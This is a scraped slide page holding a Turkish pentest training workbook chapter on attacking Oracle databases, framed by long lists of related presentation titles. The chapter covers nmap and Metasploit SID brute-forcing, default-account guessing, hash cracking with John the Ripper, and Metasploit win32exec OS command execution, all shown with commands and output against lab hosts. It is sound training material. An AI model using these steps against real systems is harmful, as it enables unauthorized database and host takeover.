Oracle Veritabanı Güvenlik Testi Çalışmaları
Oracle Veritabanı Güvenlik Testi ÇalışmalarıOracle Veritabanı Güvenlik Testi Çalışmaları
Oracle Veritabanı Güvenlik Testi ÇalışmalarıBGA Cyber Security
 
Scada Sistemleri ve Güvenliği
Scada Sistemleri ve GüvenliğiScada Sistemleri ve Güvenliği
Scada Sistemleri ve GüvenliğiAhmet Gürel
 
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux 2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux Burak Oğuz
 
Weblogic performance tips&tricks
Weblogic performance tips&tricksWeblogic performance tips&tricks
Weblogic performance tips&tricksZekeriya Besiroglu
 
Windows 7 Ortamında Zararlı Yazılım Analizi
Windows 7 Ortamında Zararlı Yazılım AnaliziWindows 7 Ortamında Zararlı Yazılım Analizi
Windows 7 Ortamında Zararlı Yazılım AnaliziBGA Cyber Security
 
Sızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıBGA Cyber Security
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıBGA Cyber Security
 

Similar to VERİTABANI SIZMA TESTLERİ (20)

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI
MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARIMICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI
MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI
 
Veritabanı Sızma Testleri - Keşif
Veritabanı Sızma Testleri - KeşifVeritabanı Sızma Testleri - Keşif
Veritabanı Sızma Testleri - Keşif
 
.Net ile yazılım güvenliği
.Net ile yazılım güvenliği.Net ile yazılım güvenliği
.Net ile yazılım güvenliği
 
Oracle Golden Gate
Oracle Golden GateOracle Golden Gate
Oracle Golden Gate
 
Ossec - Host Based Saldırı Tespit Sistemi
Ossec - Host Based Saldırı Tespit SistemiOssec - Host Based Saldırı Tespit Sistemi
Ossec - Host Based Saldırı Tespit Sistemi
 
Log yonetimi tecrubeleri
Log yonetimi tecrubeleriLog yonetimi tecrubeleri
Log yonetimi tecrubeleri
 
WAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
WAF atlatma yontemleri, Hacktrick14,  Suleyman OzarslanWAF atlatma yontemleri, Hacktrick14,  Suleyman Ozarslan
WAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
 
Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2
 
PostgreSQL Hem Güçlü Hem Güzel!
PostgreSQL Hem Güçlü Hem Güzel!PostgreSQL Hem Güçlü Hem Güzel!
PostgreSQL Hem Güçlü Hem Güzel!
 
Zmap Hack The Planet
Zmap Hack The PlanetZmap Hack The Planet
Zmap Hack The Planet
 
Oracle Veritabanı Güvenlik Testi Çalışmaları
Oracle Veritabanı Güvenlik Testi ÇalışmalarıOracle Veritabanı Güvenlik Testi Çalışmaları
Oracle Veritabanı Güvenlik Testi Çalışmaları
 
Scada Sistemleri ve Güvenliği
Scada Sistemleri ve GüvenliğiScada Sistemleri ve Güvenliği
Scada Sistemleri ve Güvenliği
 
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux 2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
 
PostgreSQL DBA Neler Yapar?
PostgreSQL DBA Neler Yapar?PostgreSQL DBA Neler Yapar?
PostgreSQL DBA Neler Yapar?
 
Weblogic performance tips&tricks
Weblogic performance tips&tricksWeblogic performance tips&tricks
Weblogic performance tips&tricks
 
Windows 7 Ortamında Zararlı Yazılım Analizi
Windows 7 Ortamında Zararlı Yazılım AnaliziWindows 7 Ortamında Zararlı Yazılım Analizi
Windows 7 Ortamında Zararlı Yazılım Analizi
 
Sızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage Kullanımı
 
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 1
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 1BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 1
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 1
 
Nagios ile Sistem ve Network Monitoring
Nagios ile Sistem ve Network MonitoringNagios ile Sistem ve Network Monitoring
Nagios ile Sistem ve Network Monitoring
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
 

More from BGA Cyber Security

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiBGA Cyber Security
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfBGA Cyber Security
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiBGA Cyber Security
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?BGA Cyber Security
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBGA Cyber Security
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketlerBGA Cyber Security
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıBGA Cyber Security
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020BGA Cyber Security
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriBGA Cyber Security
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakBGA Cyber Security
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIBGA Cyber Security
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiBGA Cyber Security
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİBGA Cyber Security
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Cyber Security
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerBGA Cyber Security
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsBGA Cyber Security
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi ToplamaBGA Cyber Security
 
SSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiSSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiBGA Cyber Security
 

More from BGA Cyber Security (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketler
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
 
Open Source SOC Kurulumu
Open Source SOC KurulumuOpen Source SOC Kurulumu
Open Source SOC Kurulumu
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
 
Siber Fidye 2020 Raporu
Siber Fidye 2020 RaporuSiber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
 
SSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiSSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain Tespiti
 

VERİTABANI SIZMA TESTLERİ

  • 1. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity PENTEST EĞİTİMİ UYGULAMA KİTABI BÖLÜM - 7
  • 2. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity İÇİNDEKİLER 7.VERİTABANI SIZMA TESTLERİ BU KATEGORİDEKİ LAB UYGULAMA LİSTESİ 7.1. Ön Tanımlı Sid Değerine Sahip Oracle Veritabanlarının Tespit Edilmesi 7.2. Ön Tanımlı Hesaplardan Kapalı ve Açık Olanların Tespit Edilmesi 7.3. Elde Edilen Parola Özetlerinin Kırılması 7.4. Ele Geçirilen Veritabanı Yöneticisi Hesabı Üzerinden İşletim Sistemini Ele Geçirme
  • 3. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity 7.1. Ön TanımlıSid DeğerineSahip Oracle Veritabanlarının Tespit Edilmesi Amaç: Oracle veritabanlarında kullanılan ön tanımlı SID değerlerinin tespit edilmesi. Araç: Nmap, Metasploit. Açıklama: SID (System Identifier) değeri her veritabanı için tekdir. Veritabanlarına giriş için SID değeri kullanılmaktadır. SID değerinin varsayılan olarak bırakılması saldırganları hedeflerinde bir adım daha yaklaştıran önemli bir açıklıktır. Uygulama-1(nmap; oracle-sid-brute: parametresiz): Nmap uygulaması ile ön tanımlı SID değerleri tespit edilecektir. Nmap kendi bünyesinde tanımlı olan tarama biçimlerinin yanında script (özelleştirilmiş kod blokları) sayesinde daha geniş ve esnek bir tarama imkânı sunmaktadır. Bu uygulamada kullanılacak olan script “oracle-sid-brute” scriptidir. root@bt:~# nmap --script=oracle-sid-brute 192.168.1.23 -p 1521 Starting Nmap 6.01 ( http://nmap.org ) at 2014-08-31 15:49 EEST Nmap scan report for 192.168.1.23 Host is up (0.00017s latency). PORT STATE SERVICE 1521/tcp open oracle | oracle-sid-brute: |_ ORACLE MAC Address: 00:0C:29:CC:F9:01 (VMware) Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds Görüldüğü gibi verilen IP adresinde bulunan oracle veritabanında bir adet ön tanımlı SID değeri bulunabilmiştir. Eğer bu veritabanında bir de kullanıcılar ve parolaları ön tanımlı olarak bırakıldı ise veritabanı tamamen tehlike altında demektir. Burada nmap scripti parametresiz olarak kullanılmıştır. Nmap tespit edilen ön tanımlı SID değerlerini denemektedir, bu değerler ülkeden ülkeye farklılıklar göstermektedir. Bu yüzden kendinize ait bir SID değeri sözlüğünüzün bulunması testin daha gerçekçi olması açısından daha önemlidir. Uygulama-2(nmap; oracle-sid-brute: parametresiz): Nmap uygulamasının parametreleri değiştirilen scriptler ile birlikte kullanmak daha detaylı ve gerçekçi taramalar yapılmasını sağlar. root@bt:~# nmap --script=oracle-sid-brute --script- args=oraclesids=/root/Desktop/default-sid.txt 192.168.1.23 -p 1521 Starting Nmap 6.01 ( http://nmap.org ) at 2014-08-31 16:17 EEST
  • 4. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity Nmap scan report for 192.168.1.23 Host is up (0.00027s latency). PORT STATE SERVICE 1521/tcp open oracle | oracle-sid-brute: |_ ORACLE MAC Address: 00:0C:29:CC:F9:01 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.90 seconds Görüldüğü üzere yine ön tanımlı SID değeri tespit edilmiş oldu. Uygulama-3(Metasploit: sid_brute): Metasploit framework içerisinde oracle veritabanlarına yönelik birçok denetleme modülleri bulunmaktadır. Burada kullanılacak modülün adı ve dizini: auxiliary/scanner/oracle/sid_brute. Modül sisteme tanıtıldıktan sonra “show options” komutu ile program seçenekleri görüntülenir. msf auxiliary(sid_brute) > show options Module options (auxiliary/scanner/oracle/sid_brute): Name Current Setting Required Description -------- --------------- ----------------------------------------------------------- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 RHOSTS yes The target address range or CIDR identifier RPORT 1521 yes The target port SID no A specific SID to attempt. SID_FILE /opt/metasploit/msf3/data/wordlists/sid.txt no File containing instance names, one per line STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads VERBOSE true yes Whether to print output for all attempts Yine bu modülün seçeneklerinde SID listesi varsayılan olarak düzenlenmiştir, fakat istenildiği durumlarda değiştirilebilir. Yine her modül kullanımında aynı olmak üzere “Required” sekmesi altında bulunan ve “Yes” olarak işaretlenmiş olan değerler hedef sisteme göre yeniden girilmesi zorunlu değerlerdir. Gerekli alanlar doldurulduktan sonra
  • 5. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity modül “run” veya “exploit” komutu ile çalıştırılır. Örnek bir modül çıktısı aşağıda paylaşılmıştır. msf auxiliary(sid_brute) > run [*] Checking 571 SIDs against 192.168.1.23:1521 [+] 192.168.1.23:1521 Oracle - 'ORACLE' is valid [+] 192.168.1.23:1521 Oracle - 'CLREXTPROC' is valid [*] Scanned 1 of 3 hosts (033% complete) [*] Checking 571 SIDs against 192.168.1.24:1521 [-] 192.168.1.24:1521 Oracle - unable to connect to a TNS listener [*] Scanned 2 of 3 hosts (066% complete) [*] Checking 571 SIDs against 192.168.1.25:1521 [+] 192.168.1.25:1521 Oracle - 'PLSEXTPROC' is valid [*] Scanned 3 of 3 hosts (100% complete) [*] Auxiliary module execution completed Görüldüğü üzere üç adet ön tanımlı SID değeri bulunmuştur.
  • 6. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity 7.2. Ön TanımlıHesaplardanKapalıve Açık Olanların TespitEdilmesi Amaç: Kaba kuvvet saldırısı öncesi, sistemde hangi ön tanımlı hesapların açık hangilerinin kapalı olduğunun tespit edilmesi. Araç: nmap Açıklama: Oracle veritabanında SID değerinin tespit edilmesinden sonra sistemde aktif ön tanımlı kullanıcı hesabının bulunması kaba kuvvet saldırıları için çok önemli bir adımdır. Sürümden sürüme farklılık göstermekle beraber oracle veritabanındaki kullanıcılar aşağıda listelenmiştir. Bu hesaplardan aktif olmayanlarını tespit etmek mümkün. BI PM SH IX OE HR SCOTT MGMT_VIEW MDDATA SYSMAN MDSYS SI_INFORMTN_SCHEMA ORDPLUGINS ORDSYS OLAPSYS ANONYMOUS XDB CTXSYS EXFSYS WMSYS DBSNMP TSMSYS DMSYS DIP OUTLN SYSTEM Uygulama: Bu uygulamada nmap oracle-brute script’i kullanılarak aktif olmayan hesaplar tespit edilecektir. nmap önceden tespit edilmiş SID değeri için varsayılan
  • 7. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity kullanıcılara yönelik şifre denemeleri yaparken hesapların aktif yada kapalı olduğunu öğrenebilir. Bu script 10G sonrası ürünlerde çalışmamaktadır. root@bt:/usr/share# nmap --script=oracle-brute --script-args oracle- brute.sid=xporacle 192.168.1.25 -p 1521 Starting Nmap 6.01 ( http://nmap.org ) at 2014-08-31 21:26 EEST Nmap scan report for 192.168.1.25 Host is up (0.00019s latency). PORT STATE SERVICE 1521/tcp open oracle | oracle-brute: | Accounts | CTXSYS:CHANGE_ON_INSTALL - Account is locked | DIP:DIP - Account is locked | DMSYS:DMSYS - Account is locked | EXFSYS:EXFSYS - Account is locked | HR:HR - Account is locked | MDDATA:MDDATA - Account is locked | MDSYS:MDSYS - Account is locked | OLAPSYS:MANAGER - Account is locked | ORDPLUGINS:ORDPLUGINS - Account is locked | ORDSYS:ORDSYS - Account is locked | OUTLN:OUTLN - Account is locked | SH:SH - Account is locked | SYSTEM:WELCOME1 - Account is locked | WMSYS:WMSYS - Account is locked | XDB:CHANGE_ON_INSTALL - Account is locked | Statistics |_ Performed 695 guesses in 8 seconds, average tps: 86 MAC Address: 00:0C:29:C3:3B:62 (VMware) Nmap done: 1 IP address (1 host up) scanned in 13.00 seconds Görüldüğü üzere bazı hesapların yanında “Account is locked” ibaresi yer almaktadır. Bu şekilde aktif olmayan kullanıcılar tespit edilebilir. Dolayısı ile sürüm bilgisinden yola çıkarak ön tanımlı hesaplardan aktif olmayanlar çıkarılırsa geriye aktif olan hesaplar kalacaktır. Örneğin burada sysman, system, scott hesapları aktif.
  • 8. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity 7.3. Elde Edilen Parola Özetlerinin Kırılması Amaç: Elde edilen parola özetlerin farklı araçlar yardımı ile kırılması. Araç: Cain, John The Ripper. Açıklama: Oracle kullanıcılarına ait parolalar sistemde açık bir şekilde tutulmamaktadır. Parolalar hashleri alınmış bir şekilde sistemde muhafaza edilmektedir. Fakat yine de parolaların değerlerini elde etmek mümkün. Bu çeşitli araçların yardımı ile gerçekleştirilebilir. Burada “cain” ve “John The Ripper” araçları kullanılacaktır. Uygulama-1(Cain): Cain aracı Windows üzerinde çalıştırılabilmektedir. MITM saldırılarının yanında iyi bir şifre kırıcı olarak kullanılmaktadır. Örnek olarak elde önceki adımlarda elde edilen hashlerden aşağıdaki kullanılacaktır. KULLANICI ADI PAROLA HASH DEĞERİ SYSTEM 2D594E86F93B17A1 Hash bilgisinin girilmesinden parolanın kırılmasına kadar olan adımların ekran görüntüleri aşağıda verilmiştir. Programın “Cracker” sekmesinden, “Oracle Hashes” seçilmiştir ve çalışma alanına sağ tıklanıp parolanın hash değeri manuel olarak girilmektedir.
  • 9. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity Parolanın manuel olarak girilmesine ait ekran görüntüsü: Eklenen parolanın kırılma biçiminin seçilmesi. Parolanın kırıldığını gösteren ekran görüntüsü:
  • 10. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity John The Ripper ile: John The Ripper uygulaması çok başarılı ve başka programlar ile uyumlu çalışabilen bir programdır. Parola tanıma ve kırma noktasında en başarılı yazılımdır denilebilir. John’un parolaları kırabilmesi için parola dosyasının belirli bir formatta olması gerekmektedir. Oracle 11 öncesi için; Kabul Edilebilen Kullanıcı Adı- Hash Değerleri O$SIMON#4F8BC1809CB2AF77 username:O$SIMON#4F8BC1809CB2AF77 username:O$SIMON#4F8BC1809CB2AF77::::::: Oracle 11 ve sonrası için; Kabul Edilebilen Kullanıcı Adı- Hash Değerleri 5FDAB69F543563582BA57894FE1C1361FB8ED57B903603F2C52ED1B4D642 username:5FDAB69F543563582BA57894FE1C1361FB8ED57B903603F2C52ED1B4 D642 username:5FDAB69F543563582BA57894FE1C1361FB8ED57B903603F2C52ED1B4 D642::::::: Parolaların “hashes.txt” adında bir dosyada, yukarıdaki metotlardan biri kullanılarak tutulduğu varsayılmaktadır. Bu düzende kullanılabilecek John komutları; john hashes.txt john --format=oracle hashes.txt john --format=oracle11 hashes.txt Parolanın kırıldığı program çıktısı: (parola kırmızı renkte gösterilmiştir.) root@kali:~/Desktop# john --wordlist=/usr/share/wordlists/rockyou.txt -- format=oracle hashes.txt Loaded 2 password hashes with 2 different salts (Oracle 10 DES [32/64]) Remaining 1 password hash ORACLE (?) guesses: 1 time: 0:00:00:00 DONE (Thu Sep 4 18:05:51 2014) c/s: 638850 trying: ORACLE
  • 11. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity 7.4. Ele Geçirilen Veritabanı YöneticisiHesabıÜzerindenİşletim SisteminiEle Geçirme Amaç: Ele geçirilen veritabanı yöneticisi hesabının kullanılarak, oracle veritabanının üzerinde bulunduğu işletim sistemini ele geçirmek. Araç: Metasploit Açıklama: Oracle veritabanında bulunan yetkili kullanıcıların dolaylı olarak işletim sistemi üzerinde komut çalıştırma hakları vardır. Bunun yapılabilmesi için bazı java sınıflarının oluşturulması ve yönetici hesabı yetkileri ile çalıştırılması gerekmektedir. Bu komutlar SYSTEM hakları ile çalıştırıldığından sisteme kullanıcı ekleme, sistemde bir servisin başlatılması gibi çok önemli işlemlerin yapılasına olanak sağlamaktadır. Bu iş için özelleştirilmiş Metasploit modülleri bulunmaktadır. win32exec modülü java sınıflarını kullanarak işletim sisteminde komut çalıştırabilmektedir. Bu modülün açık adı ve dizini auxiliary/admin/oracle/post_exploitation/win32exec’dir. Uygulama: “use auxiliary/admin/oracle/post_exploitation/win32exec” komutu ile modül sisteme tanıtılır. “show options” komutu ile doldurulması gerekli alanlar belirlenir ve doldurulur. Modülün sisteme tanıtılması ve gerekli parametrelerin tespit edilmesi aşğıda verilmiştir. msf > use auxiliary/admin/oracle/post_exploitation/win32exec msf auxiliary(win32exec) > show options Module options (auxiliary/admin/oracle/post_exploitation/win32exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD ipconfig no The OS command to execute. DBPASS TIGER yes The password to authenticate with. DBUSER SCOTT yes The username to authenticate with. RHOST yes The Oracle host. RPORT 1521 yes The TNS port. SID ORCL yes The sid to authenticate with. Sisteme yeni bir kullanıcı eklemek için gerekli düzenlemelerin yapılmış hali aşağıda verilmiştir. msf auxiliary(win32exec) > show options
